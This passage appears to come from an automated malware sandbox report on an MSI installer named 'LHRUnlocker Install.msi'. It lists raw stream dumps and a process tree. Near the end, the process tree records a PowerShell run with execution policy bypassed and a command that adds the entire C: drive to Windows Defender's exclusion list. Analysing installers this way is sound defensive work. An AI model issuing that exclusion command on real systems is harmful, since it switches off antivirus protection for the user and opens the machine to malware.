                                  Data Raw:09 01 25 01 52 01 54 01 56 01 58 01 59 01 5b 01 5d 01 5f 01 61 01 62 01 64 01 66 01 68 01 6a 01 6c 01 6d 01 6f 01 70 01 72 01 73 01 74 01 75 01 77 01 78 01 7a 01 7c 01 7e 01 80 01 82 01 84 01 86 01 88 01 8b 01 8c 01 8f 01 90 01 91 01 93 01 94 01 96 01 97 01 99 01 9b 01 9d 01 9f 01 a1 01 a3 01 a5 01 a7 01 a9 01 ab 01 ad 01 af 01 b1 01 b3 01 b5 01 b7 01 b9 01 bb 01 bd 01 bf 01 c1 01
                                  General
                                  Stream Path:\x18496\x17932\x17910\x17458\x16778\x17207\x17522
                                  File Type:data
                                  Stream Size:480
                                  Entropy:4.17269583505
                                  Base64 Encoded:False
                                  Data ASCII:= . A . . . . . . . & . ) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 . . . A . . . . . A . 3 . 3 . . . . . . . A . 3 . . . . . . . A . 3 . . . . . 3 . . . . . . . . . . . 3 . 3 . 3 . 3 . 3 . 3 . 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . . . . . . . . . . . . . . . Q .
                                  Data Raw:3d 01 41 01 04 02 12 02 1d 02 26 02 29 02 a6 02 b2 03 be 03 cd 03 d0 03 d2 03 d5 03 d8 03 dd 03 e0 03 e5 03 e7 03 e9 03 eb 03 ed 03 ef 03 f1 03 f3 03 f6 03 f7 03 f9 03 fb 03 fd 03 ff 03 01 04 03 04 05 04 07 04 0a 04 0c 04 0d 04 0e 04 0f 04 01 81 01 80 01 80 01 ac 01 80 01 ad 01 ac 33 80 01 80 41 80 01 8c 01 80 41 81 33 80 33 80 13 80 01 80 01 80 41 80 33 80 01 80 01 84 01 84 41 80
                                  General
                                  Stream Path:\x18496\x17998\x17512\x15799\x17636\x17203\x17073
                                  File Type:data
                                  Stream Size:128
                                  Entropy:4.21298288211
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 . . . 9 . m . 9 . . . . . . . . . . . ! . # . % . % . * . , . 9 . . . 9 . m . 9 . . . . . . . . . . . . . . . . . . . . . . . _ . . . _ . _ . _ . . . . . . . . . . . . . . . _ . . . _ . _ .
                                  Data Raw:a4 02 a4 02 aa 02 aa 02 f8 02 f8 02 fc 02 11 03 1b 03 1b 03 1b 03 1b 03 1b 03 1b 03 1b 03 1b 03 39 00 f9 02 39 00 6d 03 39 00 f9 02 01 03 01 03 cb 01 1f 03 21 03 23 03 25 03 25 03 2a 03 2c 03 39 00 96 06 39 00 6d 03 39 00 96 06 98 06 98 06 99 06 99 06 99 06 9e 06 9d 06 9e 06 9c 06 9b 06 5f 00 97 06 5f 00 5f 00 5f 00 97 06 98 06 98 06 9a 06 9a 06 9a 06 9f 06 5f 00 9f 06 5f 00 5f 00
                                  No network behavior found

                                  Click to jump to process

                                  Target ID:0
                                  Start time:18:49:20
                                  Start date:23/02/2022
                                  Path:C:\Windows\System32\msiexec.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\LHRUnlocker Install.msi"
                                  Imagebase:0x7ff6544f0000
                                  File size:66048 bytes
                                  MD5 hash:4767B71A318E201188A0D0A420C8B608
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:1
                                  Start time:18:49:21
                                  Start date:23/02/2022
                                  Path:C:\Windows\System32\msiexec.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\msiexec.exe /V
                                  Imagebase:0x7ff6544f0000
                                  File size:66048 bytes
                                  MD5 hash:4767B71A318E201188A0D0A420C8B608
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:3
                                  Start time:18:49:22
                                  Start date:23/02/2022
                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding D930A47D56309F190C9E79168CF159A8 C
                                  Imagebase:0x12e0000
                                  File size:59904 bytes
                                  MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:7
                                  Start time:18:49:35
                                  Start date:23/02/2022
                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding EE2A3AF825C1BBEBB4FC2081145CDAF4
                                  Imagebase:0x12e0000
                                  File size:59904 bytes
                                  MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:8
                                  Start time:18:49:40
                                  Start date:23/02/2022
                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):true
                                  Commandline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue."
                                  Imagebase:0x900000
                                  File size:430592 bytes
                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Reputation:high

                                  Target ID:9
                                  Start time:18:49:41
                                  Start date:23/02/2022
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7f20f0000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:20
                                  Start time:18:51:21
                                  Start date:23/02/2022
                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\
                                  Imagebase:0x900000
                                  File size:430592 bytes
                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Reputation:high

                                  No disassembly